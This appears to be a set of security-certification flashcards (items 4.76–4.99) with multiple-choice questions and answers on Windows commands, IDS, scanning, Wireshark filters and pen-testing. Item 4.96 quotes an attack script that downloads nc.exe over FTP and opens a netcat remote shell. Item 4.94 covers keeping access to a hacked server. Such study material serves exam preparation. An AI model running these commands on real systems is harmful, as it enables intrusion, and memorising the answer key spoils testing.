Day 4 76-114 Flashcards
4.76 Which command would launch the Computer Management console on a Windows computer? A. gpedit B. ncpa.cpl C. services.msc D. compmgmt.msc
D. compmgmt.msc Try running compmgmt.msc from your command prompt! (on a Windows machine, of course)
4.77 Which Windows command lists all the shares you have access to? A. NET CONFIG B. NET VIEW C. NET USE D. NET FILE
B. NET VIEW Again, try running this command from a Windows machine! If nothing shows up, then you don’t have access to any shares at the moment.
4.78 When you return to your desk after a lunch break, you notice a strange email in your inbox. The sender is someone you did business with recently, but the subject line has strange characters in it. What should you do? A. Delete the email and pretend nothing happened B. Reply to the sender and ask them for more information about the message contents C. Forward the message to your supervisor and ask for his opinion on how to handle it D. Forward the message to your security response team and delete the message from your computer
D. Forward the message to your security response team and delete the message from your computer
4.79 You want to ensure your machines are compliant with the security policy. Which type of tool would you most likely use? A. Port scanner B. Vulnerability scanner C. Protocol analyzer D. Intrusion Detection System
B. Vulnerability scanner Both the port scanner and the vulnerability scanner will show you which ports are open. The vuln scanner, however, will show you much more, including which user accounts have weak or missing passwords, which patches are missing, which machines have old or outdated antivirus signatures, and a variety of other weaknesses.
4.80 Which protocol is specifically designed to send event messages? A. SMS B. Syslog C. SNMP D. ICMP
B. Syslog
4.81 Which command-line utility lets you scan through text files and finds the regular expressions you define? In other words, which lets you do a “search” for “key-words” in text files? A. Notepad B. Grep C. MS Excel D. Relational database
B. Grep
4.82 You have two machines. Snort is installed on 192.168.0.99. The next machine is a Syslog server with the IP 192.168.0.150. You do a syn scan on the network, but the Syslog server isn’t getting the alert message from snort. You run Wireshark to see if the messages are being sent to the Syslog server. Which Wireshark filter will show the messages from the snort machine to the Syslog machine? A. tcp.srcport==514 && ip.src==192.168.0.99 B. Tcp.srcport==514 && ip.src==192.168.150 C. Tcp.dstport==514 && ip.dst==192.168.0.0/16 D. Tcp.dstport==514 && ip.dst==192.168.0.150
D. Tcp.dstport==514 && ip.dst==192.168.0.150
4.83 A network administrator discovers several unknown files in the root directory of his Linux FTP server. One of the files is a tarball, two are shell script files, and the third is a binary file is named “nc.” The FTP server’s access logs show that the anonymous user account logged in to the server, uploaded the files, and extracted the contents of the tarball and ran the script using a function provided by the FTP server’s software. The ps command shows that the nc file is running as process, and the netstat command shows the nc process is listening on a network port. What kind of vulnerability must be present to make this remote attack possible? A. Directory traversal B. Brute force login C. File system permissions D. Privilege escalation
D. Privilege escalation
4.84 From your computer you try to ping a server on the network. You know it’s up and running, but you don’t get any response from your ping attempts. Why could this be? A. The ARP is disabled on the target server B. ICMP could be disabled on the target server C. TCP/IP doesn’t support ICMP D. You need to run the ping command with root privileges
B. ICMP could be disabled on the target server
4.85 Which could help determine the attack surface of your company? A. Running a network scan to detect network services in the corporate DMZ B. Using configuration management to determine when and where to apply security patches C. Reviewing the need for a security clearance for each employee D. Training employees on the security policy regarding social engineering
A. Running a network scan to detect network services in the corporate DMZ
4.86 Your IDS captured some traffic that is possibly malicious. Which type of tool can help you determine if it really was malicious, or if it was just a false positive? A. Vulnerability scanner B. Network sniffer C. Intrusion Prevention System D. Protocol analyzer
D. Protocol analyzer
4.87 After doing a pen-test, you need to restore systems to a pre-test state. Which of these would NOT be included in this end-step? I. Removing all files uploaded on the system II. Cleaning all registry entries III. Mapping of network state IV. Removing all tools and maintaining backdoor for reporting A. III B. IV C. III and IV D. All should be included
B. IV
4.88 During an audit of IT processes, you find that there are no documented security procedures. What should you do in this event? A. Terminate the audit B. Create a procedures document C. Conduct compliance testing D. Identify and evaluate existing practices
D. Identify and evaluate existing practices
4.89 Which of the following is an extremely common IDS evasion technique in the web world? A. Spyware B. Port knocking C. Unicode characters D. Subnetting
C. Unicode characters Unicode is an international encoding standard for use with different languages and scripts, by which each letter, digit, or symbol is assigned a unique numeric value that applies across different platforms and programs. An IDS can be evaded by obfuscating or encoding the attack payload in a way that the target computer will reverse but the IDS will not. An adversary using the Unicode character could encode attack packets that an IDS would not recognize but that an IIS web server would decode and become attacked.
4.90 Which tool could be used for passive operating-system fingerprinting? A. nmap B. ping C. tcpdump D. tracert
C. tcpdump While nmap can certainly do OS fingerprinting, it is considered active because you send traffic to the target. Tcpdump, on the other hand, is a sniffer, and by observing differences in the traffic you capture, you can determine the OS that sent the traffic. Tcpdump is passive as it does not send traffic to the target.
4.91 Which type of tool would allow you to monitor all network traffic for malicious behavior, and send you an alert when it finds some? A. Firewall B. Proxy C. Network-based IDS D. Host-based IDS
C. Network-based IDS
4.92 A large and well-organized hacking group will discover vulnerabilities but keep them quiet and hold on to them for later use. If one of these groups was to exploit and utilize several different vulnerabilities against you at once, what would this be considered? A. no-day B. Zero-sum C. Zero-day D. Zero-hour
C. Zero-day A Zero-Day attack exploits a previously unknown vulnerability.
4.93 A covert channel is a channel that.. A. Transfers information over or within a computer system or network that is outside of the security policy B. Transfers information over or within a computer system or network that is encrypted C. Transfers information via a communication path within a computer system or network for transfer of data D. Transfers information over or within a computer system or network that is within the security policy
A. Transfers information over or within a computer system or network that is outside of the security policy
4.94 You’ve successfully gained root access to a remote server. What is the first thing you should do so that you continue to maintain access to this server? A. Create a user account B. Download and install Netcat C. Disable IPTables D. Disable Key Services
A. Create a user account
4.95 Which of these is a proxy tool that will let you intercept, test, and analyze your own web traffic in order to help you find vulnerabilities in web apps? A. Proxychains B. Dimitry C. Maskgen D. Burpsuite
D. Burpsuite Burp Suite is a Java application that can be used to secure or penetrate web applications. The suite consists of different tools, such as a proxy server, a web spider, intruder and repeater.
4.96 A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web server. While it is effective, the tester finds it tedious to perform extended functions. On further research, the tester comes across a perl script that runs the following msadc functions: system(“perl msadc.pl -h $host -c "echo open $your >testfile"”); system(“perl msadc.pl -h $host -c "echo $pass»testfile"”); system(“perl msadc.pl -h $host -c "echo bin»testfile"”); system(“perl msadc.pl -h $host -c "echo get nc.exe»testfile"”); system(“perl msadc.pl -h $host -c "echo get hacked.html»testfile"”); system(“perl msadc.pl -h $host -c "echo quit»testfile"”); system(“perl msadc.pl -h $host -c "ftp -s: testfile"”); $0=; print “Opening”. \n”; system(“perl msadc.pl -h $host -c "nc -I -p $port -e cmd.exe"”); Which exploit is indicated by this script? A. A buffer overflow exploit B. A chained exploit C. A SQL injection exploit D. A denial of service exploit
B. A chained exploit
4.97 You implement a blacklist for known-malicious IP addresses out on the internet. Immediately after this you get an alert that one or your PC’s is connected to one of these blacklisted IP’s that is a known C2 (command-and-control) server. You now need to get a rough idea of how severe this situation is, so which of these should you analyze? A. The IDS log B. Event logs on the Domain Controller (DC) C. Internet Firewall/Proxy log D. Event logs on the PC
D. Event logs on the PC The IDS only started logging these packets when you implemented the blacklist, so that won’t be enough info. To find out things like which program/process is causing this traffic, when it was installed, etc, you should look at the event logs on the PC itself.
4.98 You’re experiencing slow network traffic, so you’ve decided to start monitoring all internet traffic. Legally speaking, what could cause a problem here? A. Not informing the employees that they are going to be monitored could be an invasion of privacy. B. The network could still experience traffic slowdowns. C. You would be telling employees who the boss is. D. All of the employees would stop normal work activities.
A. Not informing the employees that they are going to be monitored could be an invasion of privacy.
4.99 Your company has many private IP’s and a range of public IP’s. Mary in the IT department monitors network traffic and finds that a large number of both IP ranges are sending traffic to a single IP address on the internet that is blacklisted. It turns out that these company machines have been compromised. Which type of attack is taking place here? A. Advanced Persistent Threat B. Rootkit attack C. Botnet attack D. Spear Phishing attack
C. Botnet attack
